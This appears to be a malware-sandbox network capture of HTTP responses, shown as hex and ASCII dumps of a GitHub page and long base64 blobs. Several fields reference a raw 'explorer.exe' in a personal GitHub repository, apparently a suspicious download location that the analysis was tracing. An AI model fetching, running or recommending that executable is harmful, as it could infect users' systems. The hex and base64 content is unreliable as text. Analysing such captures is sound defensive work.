                                                                                                                                  2022-10-17 20:07:12 UTC505INData Raw: 31 20 76 2d 61 6c 69 67 6e 2d 6d 69 64 64 6c 65 22 3e e2 86 b5 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 2f 64 69 76 3e 0a 0a 20 20 20 20 3c 64 69 76 20 61 72 69 61 2d 68 69 64 64 65 6e 3d 22 74 72 75 65 22 20 63 6c 61 73 73 3d 22 62 6f 72 64 65 72 20 72 6f 75 6e 64 65 64 2d 32 20 66 6c 65 78 2d 73 68 72 69 6e 6b 2d 30 20 63 6f 6c 6f 72 2d 62 67 2d 73 75 62 74 6c 65 20 70 78 2d 31 20 63 6f 6c 6f 72 2d 66 67 2d 6d 75 74 65 64 20 6d 6c 2d 31 20 66 36 20 64 2d 6e 6f 6e 65 20 64 2d 6f 6e 2d 6e 61 76 2d 66 6f 63 75 73 20 6a 73 2d 6a 75 6d 70 2d 74 6f 2d 62 61 64 67 65 2d 6a 75 6d 70 22 3e 0a 20 20 20 20 20 20 4a 75 6d 70 20 74 6f 0a 20 20 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 64 2d 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 20 6d 6c 2d 31 20 76 2d 61 6c 69
                                                                                                                                  Data Ascii: 1 v-align-middle"></span> </div> <div aria-hidden="true" class="border rounded-2 flex-shrink-0 color-bg-subtle px-1 color-fg-muted ml-1 f6 d-none d-on-nav-focus js-jump-to-badge-jump"> Jump to <span class="d-inline-block ml-1 v-ali
                                                                                                                                  2022-10-17 20:07:12 UTC506INData Raw: 6f 6c 6f 72 3a 20 74 72 61 6e 73 70 61 72 65 6e 74 3b 20 62 6f 72 64 65 72 3a 20 6e 6f 6e 65 22 20 64 61 74 61 2d 76 69 65 77 2d 63 6f 6d 70 6f 6e 65 6e 74 3d 22 74 72 75 65 22 20 63 6c 61 73 73 3d 22 61 75 74 68 2d 66 6f 72 6d 2d 62 6f 64 79 20 50 6f 70 6f 76 65 72 20 70 6f 73 69 74 69 6f 6e 2d 61 62 73 6f 6c 75 74 65 20 64 2d 6e 6f 6e 65 20 64 2d 73 6d 2d 6e 6f 6e 65 20 64 2d 6d 64 2d 6e 6f 6e 65 20 64 2d 6c 67 2d 62 6c 6f 63 6b 22 3e 0a 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 77 69 64 74 68 3a 20 33 30 30 70 78 22 20 64 61 74 61 2d 76 69 65 77 2d 63 6f 6d 70 6f 6e 65 6e 74 3d 22 74 72 75 65 22 20 63 6c 61 73 73 3d 22 50 6f 70 6f 76 65 72 2d 6d 65 73 73 61 67 65 20 42 6f 78 20 50 6f 70 6f 76 65 72 2d 6d 65 73 73 61 67 65 2d 2d 74 6f 70 2d 72 69 67 68
                                                                                                                                  Data Ascii: olor: transparent; border: none" data-view-component="true" class="auth-form-body Popover position-absolute d-none d-sm-none d-md-none d-lg-block"> <div style="width: 300px" data-view-component="true" class="Popover-message Box Popover-message--top-righ
                                                                                                                                  2022-10-17 20:07:12 UTC508INData Raw: 61 61 2d 73 75 70 70 6f 72 74 22 20 6e 61 6d 65 3d 22 77 65 62 61 75 74 68 6e 2d 69 75 76 70 61 61 2d 73 75 70 70 6f 72 74 22 20 76 61 6c 75 65 3d 22 75 6e 6b 6e 6f 77 6e 22 3e 0a 3c 69 6e 70 75 74 20 74 79 70 65 3d 22 68 69 64 64 65 6e 22 20 6e 61 6d 65 3d 22 72 65 74 75 72 6e 5f 74 6f 22 20 69 64 3d 22 72 65 74 75 72 6e 5f 74 6f 22 20 76 61 6c 75 65 3d 22 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 63 6f 6d 2f 74 65 73 74 65 72 6d 61 6e 6d 61 67 2f 6d 79 6f 77 6e 72 65 2f 72 61 77 2f 6d 61 69 6e 2f 65 78 70 6c 6f 72 65 72 2e 65 78 65 22 20 61 75 74 6f 63 6f 6d 70 6c 65 74 65 3d 22 6f 66 66 22 20 63 6c 61 73 73 3d 22 66 6f 72 6d 2d 63 6f 6e 74 72 6f 6c 22 20 2f 3e 0a 3c 69 6e 70 75 74 20 74 79 70 65 3d 22 68 69 64 64 65 6e 22 20 6e 61 6d 65 3d 22 61 6c
                                                                                                                                  Data Ascii: aa-support" name="webauthn-iuvpaa-support" value="unknown"><input type="hidden" name="return_to" id="return_to" value="https://github.com/testermanmag/myownre/raw/main/explorer.exe" autocomplete="off" class="form-control" /><input type="hidden" name="al
                                                                                                                                  2022-10-17 20:07:12 UTC508INData Raw: 32 32 45 43 0d 0a 69 64 22 20 69 64 3d 22 63 6c 69 65 6e 74 5f 69 64 22 20 61 75 74 6f 63 6f 6d 70 6c 65 74 65 3d 22 6f 66 66 22 20 63 6c 61 73 73 3d 22 66 6f 72 6d 2d 63 6f 6e 74 72 6f 6c 22 20 2f 3e 0a 3c 69 6e 70 75 74 20 74 79 70 65 3d 22 68 69 64 64 65 6e 22 20 6e 61 6d 65 3d 22 69 6e 74 65 67 72 61 74 69 6f 6e 22 20 69 64 3d 22 69 6e 74 65 67 72 61 74 69 6f 6e 22 20 61 75 74 6f 63 6f 6d 70 6c 65 74 65 3d 22 6f 66 66 22 20 63 6c 61 73 73 3d 22 66 6f 72 6d 2d 63 6f 6e 74 72 6f 6c 22 20 2f 3e 0a 3c 69 6e 70 75 74 20 74 79 70 65 3d 22 74 65 78 74 22 20 6e 61 6d 65 3d 22 72 65 71 75 69 72 65 64 5f 66 69 65 6c 64 5f 30 36 65 37 22 20 68 69 64 64 65 6e 3d 22 68 69 64 64 65 6e 22 20 63 6c 61 73 73 3d 22 66 6f 72 6d 2d 63 6f 6e 74 72 6f 6c 22 20 2f 3e 3c 69
                                                                                                                                  Data Ascii: 22ECid" id="client_id" autocomplete="off" class="form-control" /><input type="hidden" name="integration" id="integration" autocomplete="off" class="form-control" /><input type="text" name="required_field_06e7" hidden="hidden" class="form-control" /><i
                                                                                                                                  2022-10-17 20:07:12 UTC509INData Raw: 6f 6e 5f 69 6e 5f 70 61 67 65 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 73 69 74 65 20 68 65 61 64 65 72 20 6d 65 6e 75 26 71 75 6f 74 3b 2c 26 71 75 6f 74 3b 72 65 70 6f 73 69 74 6f 72 79 5f 69 64 26 71 75 6f 74 3b 3a 6e 75 6c 6c 2c 26 71 75 6f 74 3b 61 75 74 68 5f 74 79 70 65 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 53 49 47 4e 5f 55 50 26 71 75 6f 74 3b 2c 26 71 75 6f 74 3b 6f 72 69 67 69 6e 61 74 69 6e 67 5f 75 72 6c 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 63 6f 6d 2f 74 65 73 74 65 72 6d 61 6e 6d 61 67 2f 6d 79 6f 77 6e 72 65 2f 72 61 77 2f 6d 61 69 6e 2f 65 78 70 6c 6f 72 65 72 2e 65 78 65 26 71 75 6f 74 3b 2c 26 71 75 6f 74 3b 75 73 65 72 5f 69 64 26 71 75 6f 74 3b 3a 6e 75 6c 6c 7d 7d 22 20 64 61 74 61 2d 68
                                                                                                                                  Data Ascii: on_in_page&quot;:&quot;site header menu&quot;,&quot;repository_id&quot;:null,&quot;auth_type&quot;:&quot;SIGN_UP&quot;,&quot;originating_url&quot;:&quot;https://github.com/testermanmag/myownre/raw/main/explorer.exe&quot;,&quot;user_id&quot;:null}}" data-h
                                                                                                                                  2022-10-17 20:07:12 UTC511INData Raw: 31 2e 30 36 2d 31 2e 30 36 4c 36 2e 39 34 20 38 20 33 2e 37 32 20 34 2e 37 38 61 2e 37 35 2e 37 35 20 30 20 30 31 30 2d 31 2e 30 36 7a 22 3e 3c 2f 70 61 74 68 3e 0a 3c 2f 73 76 67 3e 0a 20 20 20 20 3c 2f 62 75 74 74 6f 6e 3e 0a 20 20 20 20 0a 20 20 20 20 20 20 3c 64 69 76 3e 7b 7b 20 6d 65 73 73 61 67 65 20 7d 7d 3c 2f 64 69 76 3e 0a 0a 20 20 3c 2f 64 69 76 3e 0a 3c 2f 64 69 76 3e 0a 20 20 3c 2f 74 65 6d 70 6c 61 74 65 3e 0a 3c 2f 64 69 76 3e 0a 0a 0a 20 20 20 20 0a 20 20 3c 69 6e 63 6c 75 64 65 2d 66 72 61 67 6d 65 6e 74 20 63 6c 61 73 73 3d 22 6a 73 2d 6e 6f 74 69 66 69 63 61 74 69 6f 6e 2d 73 68 65 6c 66 2d 69 6e 63 6c 75 64 65 2d 66 72 61 67 6d 65 6e 74 22 20 64 61 74 61 2d 62 61 73 65 2d 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 63
                                                                                                                                  Data Ascii: 1.06-1.06L6.94 8 3.72 4.78a.75.75 0 010-1.06z"></path></svg> </button> <div>{{ message }}</div> </div></div> </template></div> <include-fragment class="js-notification-shelf-include-fragment" data-base-src="https://github.c
                                                                                                                                  2022-10-17 20:07:12 UTC512INData Raw: 70 4c 43 4d 32 4f 44 6b 79 51 6c 4e 61 4b 79 55 36 4f 7a 4e 45 56 56 63 30 52 55 70 42 59 52 41 51 45 41 41 51 45 44 43 67 51 45 42 51 55 42 41 51 41 41 41 41 41 52 41 51 49 44 55 77 51 68 4d 5a 48 52 6b 71 4c 53 42 52 59 58 51 56 4c 69 42 71 46 43 51 77 66 68 67 68 52 6b 46 56 45 53 59 68 4d 7a 63 59 48 2f 32 67 41 4d 41 77 45 41 41 68 45 44 45 51 41 2f 41 50 6d 74 2b 4b 4c 36 66 48 79 4d 77 44 75 39 53 71 6c 55 46 74 42 52 41 7a 49 6c 4d 42 73 48 64 56 44 43 31 55 4f 42 32 34 51 70 67 4e 46 59 68 38 55 46 42 61 66 61 69 4a 54 41 43 70 50 5a 56 44 74 41 30 51 79 59 57 6c 45 70 68 62 4d 71 68 78 61 55 51 34 74 50 64 55 70 78 62 50 64 49 6c 4d 33 5a 57 4a 63 6e 46 73 30 51 4d 4c 46 53 6e 46 76 6b 67 59 57 30 56 69 43 4c 56 55 70 78 59 6f 55 77 73 43 71 47
                                                                                                                                  Data Ascii: pLCM2ODkyQlNaKyU6OzNEVVc0RUpBYRAQEAAQEDCgQEBQUBAQAAAAARAQIDUwQhMZHRkqLSBRYXQVLiBqFCQwfhghRkFVESYhMzcYH/2gAMAwEAAhEDEQA/APmt+KL6fHyMwDu9SqlUFtBRAzIlMBsHdVDC1UOB24QpgNFYh8UFBafaiJTACpPZVDtA0QyYWlEphbMqhxaUQ4tPdUpxbPdIlM3ZWJcnFs0QMLFSnFvkgYW0ViCLVUpxYoUwsCqG
                                                                                                                                  2022-10-17 20:07:12 UTC513INData Raw: 68 54 69 77 6f 55 52 59 64 6c 55 4d 4c 43 6e 4d 63 35 73 50 77 51 4e 39 4e 45 6f 34 42 43 6d 77 43 63 6f 49 74 47 79 41 69 33 68 41 32 4f 79 46 67 34 70 43 6a 67 69 5a 79 59 57 48 5a 49 55 63 46 51 63 45 51 63 41 69 77 52 61 45 53 4e 69 45 55 63 52 73 67 4c 63 4a 42 6d 56 69 5a 48 45 70 6a 42 6e 4c 59 6c 46 62 45 70 6a 42 6b 63 53 70 43 74 69 56 51 63 44 73 6f 44 39 4d 6f 4e 39 4d 71 6c 62 36 5a 33 55 6f 50 30 7a 75 6c 47 2b 6d 64 30 79 59 79 50 30 79 68 57 2b 6e 77 6f 56 73 4f 46 53 68 68 37 4d 6f 6f 34 46 45 44 46 49 56 73 55 69 74 69 6b 47 5a 53 47 4d 67 79 6f 7a 63 4b 41 59 38 49 4e 69 69 68 67 67 47 43 68 51 77 35 56 4b 33 30 77 6f 6f 66 54 47 36 49 33 30 2b 71 4c 51 77 34 55 41 78 62 52 30 41 4e 6f 32 54 6c 56 73 55 53 46 4e 69 4c 79 67 62 45 43 34
                                                                                                                                  Data Ascii: hTiwoURYdlUMLCnMc5sPwQN9NEo4BCmwCcoItGyAi3hA2OyFg4pCjgiZyYWHZIUcFQcEQcAiwRaESNiEUcRsgLcJBmViZHEpjBnLYlFbEpjBkcSpCtiVQcDsoD9MoN9Mqlb6Z3UoP0zulG+md0yYyP0yhW+nwoVsOFShh7Moo4FEDFIVsUitikGZSGMgyozcKAY8INiihggGChQw5VK30woofTG6I30+qLQw4UAxbR0ANo2TlVsUSFNiLygbEC4
                                                                                                                                  2022-10-17 20:07:12 UTC515INData Raw: 77 47 79 69 67 62 42 73 67 58 41 4b 49 47 43 4b 55 32 71 52 53 34 71 5a 58 42 63 45 6f 55 32 63 4a 56 4c 67 64 6b 4d 46 4e 68 32 51 4b 62 46 46 49 66 54 47 36 4b 58 42 51 78 6b 68 73 43 67 55 32 44 5a 46 70 44 36 59 55 55 68 74 47 6f 55 69 6b 4e 6a 6f 4a 6d 78 51 49 62 55 58 42 44 59 36 63 79 38 36 52 74 51 49 62 50 78 57 57 6f 51 32 39 31 44 43 5a 73 47 69 4e 63 68 44 62 78 33 55 45 7a 5a 33 51 49 62 44 73 6f 70 44 5a 39 36 69 6c 77 51 72 79 52 62 78 43 37 34 63 4b 71 4c 51 4a 31 51 50 6a 74 43 71 5a 55 46 70 5a 45 7a 6c 55 57 70 42 51 57 36 36 71 70 6b 34 74 34 56 67 63 57 6b 71 34 54 4b 6f 73 33 52 46 42 61 39 4b 4b 6f 63 57 61 6c 55 55 46 76 45 49 4b 43 7a 75 69 4b 43 33 68 49 68 78 61 72 45 4f 4c 43 71 48 46 71 75 4d 47 54 69 30 6c 45 4f 4c 43 71 48
                                                                                                                                  Data Ascii: wGyigbBsgXAKIGCKU2qRS4qZXBcEoU2cJVLgdkMFNh2QKbFFIfTG6KXBQxkhsCgU2DZFpD6YUUhtGoUikNjoJmxQIbUXBDY6cy86RtQIbPxWWoQ291DCZsGiNchDbx3UEzZ3QIbDsopDZ96ilwQryRbxC74cKqLQJ1QPjtCqZUFpZEzlUWpBQW66qpk4t4VgcWkq4TKos3RFBa9KKocWalUUFvEIKCzuiKC3hIhxarEOLCqHFquMGTi0lEOLCqH
                                                                                                                                  2022-10-17 20:07:12 UTC516INData Raw: 69 42 78 5a 77 6b 53 2f 41 77 74 56 69 48 46 71 59 77 6f 69 31 57 49 62 42 41 77 73 43 70 6e 42 73 52 73 6f 51 63 53 64 46 63 70 67 77 73 4b 5a 4d 5a 4e 39 4d 6f 47 2b 6e 79 67 4f 43 6c 44 59 4b 6f 4f 41 51 4e 67 4e 6b 79 63 6f 34 38 49 5a 77 4f 4b 45 48 45 6f 6f 34 37 4a 55 67 34 6f 6f 34 38 4f 71 67 34 63 4b 41 34 6f 44 6a 77 67 4f 4b 4a 79 74 69 72 53 44 69 6f 73 62 46 53 4c 52 78 43 71 51 63 52 73 68 6e 44 59 38 49 51 63 65 45 77 52 73 55 69 38 7a 59 6f 51 57 51 6a 59 38 49 6b 77 32 50 42 52 63 78 73 54 73 6f 73 48 48 68 42 73 54 73 6c 53 44 69 67 47 43 41 34 68 46 62 45 4b 44 59 68 45 6a 4e 77 67 7a 63 49 63 37 4e 77 69 73 33 43 41 4d 67 32 4b 44 59 68 51 44 48 73 69 77 4d 55 47 77 51 67 66 54 4f 79 41 59 48 5a 52 61 47 42 37 6f 4e 67 71 42 68 79 70
                                                                                                                                  Data Ascii: iBxZwkS/AwtViHFqYwoi1WIbBAwsCpnBsRsoQcSdFcpgwsKZMZN9MoG+nygOClDYKoOAQNgNkyco48IZwOKEHEoo47JUg4oo48Oqg4cKA4oDjwgOKJytirSDiosbFSLRxCqQcRshnDY8IQceEwRsUi8zYoQWQjY8Ikw2PBRcxsTsosHHhBsTslSDigGCA4hFbEKDYhEjNwgzcIc7Nwis3CAMg2KDYhQDHsiwMUGwQgfTOyAYHZRaGB7oNgqBhyp
                                                                                                                                  2022-10-17 20:07:12 UTC517INData Raw: 35 44 31 34 0d 0a 69 38 72 4d 69 4d 79 4b 32 49 56 52 6d 43 69 74 6a 31 51 48 48 68 42 73 46 49 74 62 36 5a 34 56 68 57 77 36 49 56 6a 36 61 46 62 42 49 55 4d 41 6f 72 59 42 56 47 77 34 43 41 59 6e 5a 52 57 59 68 45 5a 6c 4d 59 58 49 4d 68 47 59 4a 42 73 65 45 57 74 67 2b 6e 69 6f 42 39 50 68 44 47 51 50 70 2b 4f 69 4b 48 30 79 6f 74 4b 62 4e 79 67 47 43 44 59 68 51 67 59 44 5a 41 44 59 4e 6b 41 77 51 4b 62 4e 6c 47 69 59 6f 41 79 41 59 68 51 4c 68 77 71 46 77 4f 79 6a 52 54 5a 77 6f 70 54 59 64 55 51 75 43 4b 55 2b 6d 73 71 6d 66 54 56 6f 55 32 37 71 4b 51 32 42 51 71 5a 73 34 55 79 75 4d 6b 4e 71 69 6b 4e 76 43 47 4d 70 47 31 46 49 62 58 53 43 5a 73 4b 69 70 47 33 68 52 55 7a 61 70 46 54 4e 68 46 46 46 53 4e 6e 48 5a 51 54 75 73 65 56 4f 5a 65 64 49 32
                                                                                                                                  Data Ascii: 5D14i8rMiMyK2IVRmCitj1QHHhBsFItb6Z4VhWw6IVj6aFbBIUMAorYBVGw4CAYnZRWYhEZlMYXIMhGYJBseEWtg+nioB9PhDGQPp+OiKH0yotKbNygGCDYhQgYDZADYNkAwQKbNlGiYoAyAYhQLhwqFwOyjRTZwopTYdUQuCKU+msqmfTVoU27qKQ2BQqZs4UyuMkNqikNvCGMpG1FIbXSCZsKipG3hRUzapFTNhFFFSNnHZQTuseVOZedI2
                                                                                                                                  2022-10-17 20:07:12 UTC518INData Raw: 6f 67 74 62 62 77 74 4d 71 43 31 55 56 46 71 49 71 4c 55 52 51 57 71 6d 56 42 5a 77 69 52 53 32 77 37 4b 6f 71 4c 47 30 52 44 69 77 6c 55 71 6c 76 70 71 6c 55 46 69 4a 61 59 57 6f 68 78 59 6f 70 78 59 46 55 4e 69 4e 67 69 47 41 56 68 54 43 30 37 49 55 34 73 51 4d 4c 65 45 51 32 50 43 41 73 69 77 63 56 55 68 73 56 51 77 73 34 68 51 48 44 68 58 6d 54 6e 4e 67 66 38 41 43 67 59 57 48 67 49 44 67 64 30 51 63 45 55 63 41 6b 42 46 6f 30 64 57 41 34 63 49 47 46 6e 43 41 69 31 45 6a 43 33 65 55 55 63 52 43 45 48 48 68 41 57 51 62 45 37 4b 56 52 78 4f 79 72 49 34 6c 53 71 32 4b 55 48 46 4b 4e 68 34 70 53 6a 69 4e 6c 4b 44 69 4e 6b 6f 32 41 32 54 42 6b 63 65 41 67 4f 4a 36 49 4e 69 6f 4e 69 71 4e 6a 79 67 32 4b 41 34 6c 4d 6d 47 78 4b 6c 56 73 53 6c 42 78 50 41 52
                                                                                                                                  Data Ascii: ogtbbwtMqC1UVFqIqLURQWqmVBZwiRS2w7KoqLG0RDiwlUqlvpqlUFiJaYWohxYopxYFUNiNgiGAVhTC07IU4sQMLeEQ2PCAsiwcVUhsVQws4hQHDhXmTnNgf8ACgYWHgIDgd0QcEUcAkBFo0dWA4cIGFnCAi1EjC3eUUcRCEHHhAWQbE7KVRxOyrI4lSq2KUHFKNh4pSjiNlKDiNko2A2TBkceAgOJ6INioNiqNjyg2KA4lMmGxKlVsSlBxPAR
                                                                                                                                  2022-10-17 20:07:12 UTC520INData Raw: 73 53 47 52 57 5a 45 5a 6c 4d 72 68 6d 50 52 41 63 59 4b 71 4e 69 4e 67 67 47 41 52 57 77 64 51 6f 34 62 4b 31 41 4e 68 32 55 56 6d 62 52 57 70 47 5a 52 57 59 4b 51 42 6b 47 49 44 6f 59 77 32 49 56 41 78 35 55 55 47 4b 71 4d 33 43 45 42 6b 55 4d 65 36 55 41 32 2b 43 69 34 4c 6a 79 68 41 78 4f 33 64 41 47 4b 69 74 69 69 42 68 39 7a 71 4c 6e 4a 54 62 32 53 68 54 59 69 2f 37 69 34 71 4c 51 78 43 49 58 41 4b 4b 51 32 4b 42 54 59 69 6b 4e 71 45 4b 62 56 42 4d 32 70 56 69 5a 74 52 63 45 4e 71 67 6d 62 4e 6b 61 77 6b 62 57 55 69 31 4d 32 71 43 4e 31 71 4b 6b 62 56 46 52 75 74 55 68 55 72 72 56 46 52 75 74 52 55 62 72 56 46 71 57 4d 71 4e 50 49 74 74 6f 75 7a 67 75 4c 52 73 72 68 46 37 62 64 57 57 73 59 5a 79 73 4c 65 45 46 72 62 59 52 4d 72 57 32 71 34 52 61 32
                                                                                                                                  Data Ascii: sSGRWZEZlMrhmPRAcYKqNiNggGARWwdQo4bK1ANh2UVmbRWpGZRWYKQBkGIDoYw2IVAx5UUGKqM3CEBkUMe6UA2+Ci4LjyhAxO3dAGKitiiBh9zqLnJTb2ShTYi/7i4qLQxCIXAKKQ2KBTYikNqEKbVBM2pViZtRcENqgmbNkawkbWUi1M2qCN1qKkbVFRutUhUrrVFRutRUbrVFqWMqNPIttouzguLRsrhF7bdWWsYZysLeEFrbYRMrW2q4Ra2
                                                                                                                                  2022-10-17 20:07:12 UTC521INData Raw: 55 42 59 4f 67 49 74 4b 71 51 32 49 31 4b 45 45 41 62 64 46 46 6a 49 47 62 68 56 42 46 70 51 79 32 4b 4b 4c 49 6b 46 6b 42 77 4f 79 41 34 46 41 63 41 68 7a 43 4c 52 73 68 7a 44 6a 39 36 69 69 79 71 4d 79 55 46 75 45 47 5a 42 6d 52 59 4c 56 53 49 7a 64 30 47 59 4b 6a 4d 6b 47 38 74 6c 46 62 68 41 56 52 70 51 5a 43 4d 79 44 4d 70 67 79 7a 62 53 68 42 5a 4b 52 6d 38 45 56 6d 61 71 56 4f 64 6d 38 45 47 62 56 54 6d 57 30 57 47 71 74 52 6d 2f 42 52 57 62 68 4b 43 78 32 56 52 6d 55 49 33 64 46 5a 43 43 68 47 52 49 7a 49 72 4d 70 42 75 69 6f 33 56 51 5a 41 4b 61 4b 4b 79 6f 4b 49 45 61 71 4b 7a 42 56 41 4e 76 4c 4b 4b 42 42 51 42 6a 39 71 71 4d 67 43 69 35 5a 6b 4b 44 56 51 42 55 5a 52 51 5a 39 45 41 62 5a 43 41 31 58 51 42 49 41 79 6b 47 49 48 5a 41 47 31 43 74
                                                                                                                                  Data Ascii: UBYOgItKqQ2I1KEEAbdFFjIGbhVBFpQy2KKLIkFkBwOyA4FAcAhzCLRshzDj96iiyqMyUFuEGZBmRYLVSIzd0GYKjMkG8tlFbhAVRpQZCMyDMpgyzbShBZKRm8EVmaqVOdm8EGbVTmW0WGqtRm/BRWbhKCx2VRmUI3dFZCChGRIzIrMpBuio3VQZAKaKKyoKIEaqKzBVANvLKKBBQBj9qqMgCi5ZkKDVQBUZRQZ9EAbZCA1XQBIAykGIHZAG1Ct
                                                                                                                                  2022-10-17 20:07:12 UTC522INData Raw: 66 2f 77 43 38 2f 62 77 4a 6e 36 6e 71 74 48 2f 5a 4c 6e 37 68 65 58 2f 4a 74 65 6a 54 34 33 54 30 48 78 33 7a 37 50 70 31 65 46 53 33 2b 6c 66 37 34 54 64 6e 2b 75 2f 51 57 67 4e 53 37 31 62 6e 66 2f 73 77 70 71 2f 63 50 67 66 68 73 39 70 30 61 66 46 6c 64 50 32 46 78 76 78 31 37 50 70 31 65 46 54 2b 31 58 37 79 42 2f 36 68 2b 69 50 51 2b 70 2f 6d 4c 50 75 48 77 65 37 32 6e 64 36 32 73 2f 59 50 47 62 7a 52 33 75 6f 77 2f 70 58 2b 37 76 38 41 4e 2b 34 2f 6f 37 52 6f 52 39 51 76 2f 77 43 77 46 4d 2f 75 4a 77 6e 77 32 57 76 75 39 61 34 2b 77 65 4c 2b 4f 30 30 64 37 71 56 2f 74 54 2b 35 6d 6e 37 6e 2b 6d 69 76 79 33 2b 39 6d 57 50 63 54 68 74 31 72 36 63 4e 65 33 2f 45 37 33 52 30 5a 45 66 30 70 2f 63 69 51 2f 37 70 2b 6d 41 4a 71 4c 62 79 5a 55 7a 2b 34 6e
                                                                                                                                  Data Ascii: f/wC8/bwJn6nqtH/ZLn7heX/JtejT43T0Hx3z7Pp1eFS3+lf74Tdn+u/QWgNS71bnf/swpq/cPgfhs9p0afFldP2Fxvx17Pp1eFT+1X7yB/6h+iPQ+p/mLPuHwe72nd62s/YPGbzR3uow/pX+7v8AN+4/o7RoR9Qv/wCwFM/uJwnw2Wvu9a4+weL+O00d7qV/tT+5mn7n+mivy3+9mWPcTht1r6cNe3/E73R0ZEf0p/ciQ/7p+mAJqLbyZUz+4n
                                                                                                                                  2022-10-17 20:07:12 UTC524INData Raw: 73 2f 63 47 50 38 41 31 6e 70 63 66 39 53 6e 75 44 78 2f 79 62 4c 6f 31 65 4d 39 42 63 44 38 2b 30 36 64 50 68 45 66 30 74 2f 59 43 78 2f 32 76 39 77 44 30 2b 66 30 76 39 55 6e 75 46 78 2f 79 62 4c 6f 31 65 4d 39 42 63 44 38 2b 30 36 64 50 68 62 2b 31 2f 38 41 4c 37 46 76 31 66 37 69 66 2b 30 39 4c 2f 56 4a 37 68 63 66 38 6d 79 36 4e 58 6a 50 51 58 41 2f 50 74 4f 6e 54 34 53 2f 32 75 2f 59 57 50 38 41 34 7a 39 66 30 50 71 65 6c 2f 71 6b 39 77 65 50 2b 54 5a 39 47 72 78 6e 6f 50 67 66 6e 32 6e 54 70 38 4a 76 37 58 2f 79 2b 78 50 2b 31 2f 75 4d 66 39 5a 36 58 2b 71 54 33 42 34 2f 35 4e 6c 30 61 76 47 76 6f 50 67 66 6e 32 6e 54 70 38 4c 66 32 76 38 41 35 66 38 41 2f 77 44 4c 2f 63 48 6e 48 2f 53 65 6c 70 2f 32 53 65 34 50 48 2f 4a 73 75 6a 56 34 7a 30 48 77
                                                                                                                                  Data Ascii: s/cGP8A1npcf9SnuDx/ybLo1eM9BcD8+06dPhEf0t/YCx/2v9wD0+f0v9UnuFx/ybLo1eM9BcD8+06dPhb+1/8AL7Fv1f7if+09L/VJ7hcf8my6NXjPQXA/PtOnT4S/2u/YWP8A4z9f0Pqel/qk9weP+TZ9GrxnoPgfn2nTp8Jv7X/y+xP+1/uMf9Z6X+qT3B4/5Nl0avGvoPgfn2nTp8Lf2v8A5f8A/wDL/cHnH/Selp/2Se4PH/JsujV4z0Hw
                                                                                                                                  2022-10-17 20:07:12 UTC525INData Raw: 50 31 2f 36 50 48 53 66 55 2f 77 41 78 62 39 77 75 44 33 65 30 37 76 57 78 36 43 34 76 65 61 4f 39 31 42 2f 61 33 39 35 64 68 2b 76 2f 41 45 51 30 72 36 6e 2b 59 6e 75 46 77 65 37 32 6e 64 36 7a 30 48 78 65 38 30 64 37 71 53 75 2f 70 68 2b 2f 42 32 2f 57 66 6f 43 42 2f 6c 2b 71 44 2f 38 41 53 35 57 38 66 75 44 77 48 78 30 62 54 6f 30 2b 4a 7a 7a 39 69 63 62 6a 6d 31 37 50 70 31 65 45 44 2f 53 2f 39 2f 46 70 50 2b 30 2f 74 35 4f 74 6f 39 54 31 58 2f 38 41 70 4b 34 2f 63 48 79 2f 50 35 4e 70 30 61 66 45 6d 66 73 54 6a 76 6e 32 66 54 71 38 4b 58 39 73 66 35 68 4c 2f 77 43 6c 2f 52 51 66 2f 69 33 2f 41 4f 72 58 54 31 39 35 64 2f 70 74 4f 6a 48 69 5a 39 44 63 66 2f 72 6f 36 63 39 53 56 2f 38 41 54 58 2b 59 37 61 48 39 4a 65 42 55 32 2b 71 59 38 62 51 74 61 66
                                                                                                                                  Data Ascii: P1/6PHSfU/wAxb9wuD3e07vWx6C4veaO91B/a395dh+v/AEQ0r6n+YnuFwe72nd6z0Hxe80d7qSu/ph+/B2/WfoCB/l+qD/8AS5W8fuDwHx0bTo0+Jzz9icbjm17Pp1eED/S/9/FpP+0/t5Oto9T1X/8ApK4/cHy/P5Np0afEmfsTjvn2fTq8KX9sf5hL/wCl/RQf/i3/AOrXT195d/ptOjHiZ9Dcf/ro6c9SV/8ATX+Y7aH9JeBU2+qY8bQtaf
                                                                                                                                  2022-10-17 20:07:12 UTC526INData Raw: 56 42 59 57 36 43 41 2b 79 67 73 4c 54 44 47 4b 4d 67 59 53 53 42 32 5a 57 42 78 61 51 51 30 67 2b 39 4b 4b 67 4d 52 58 37 46 41 34 74 4a 66 68 77 37 6f 48 74 46 4f 36 6d 51 7a 4f 48 45 67 31 4b 4b 59 57 73 51 47 67 31 36 6f 68 73 58 49 4e 78 49 5a 2f 50 6b 49 4b 4d 42 41 6b 6e 54 32 43 67 41 74 59 66 34 68 41 59 51 77 31 56 6f 63 41 67 4d 30 37 6a 6e 77 55 55 57 4e 77 49 33 69 56 42 6d 49 67 48 78 30 37 4b 6b 47 53 43 52 72 78 35 36 49 43 41 62 74 47 47 67 4d 6f 70 6d 63 41 38 51 53 67 47 46 7a 43 6b 53 4f 71 41 75 78 64 36 6a 57 50 61 71 41 73 51 4e 52 51 63 7a 71 67 4f 4a 4f 37 51 34 4d 66 65 67 62 46 71 42 78 78 34 6f 41 52 70 49 42 31 6f 7a 66 67 67 59 57 38 6b 6d 65 69 44 4f 54 49 70 71 5a 46 61 55 51 62 67 43 42 54 7a 51 59 33 55 41 4c 79 42 34 70
                                                                                                                                  Data Ascii: VBYW6CA+ygsLTDGKMgYSSB2ZWBxaQQ0g+9KKgMRX7FA4tJfhw7oHtFO6mQzOHEg1KKYWsQGg16ohsXINxIZ/PkIKMBAknT2CgAtYf4hAYQw1VocAgM07jnwUUWNwI3iVBmIgHx07KkGSCRrx56ICAbtGGgMopmcA8QSgGFzCkSOqAuxd6jWPaqAsQNRQczqgOJO7Q4MfegbFqBxx4oARpIB1ozfggYW8kmeiDOTIpqZFaUQbgCBTzQY3UALyB4p
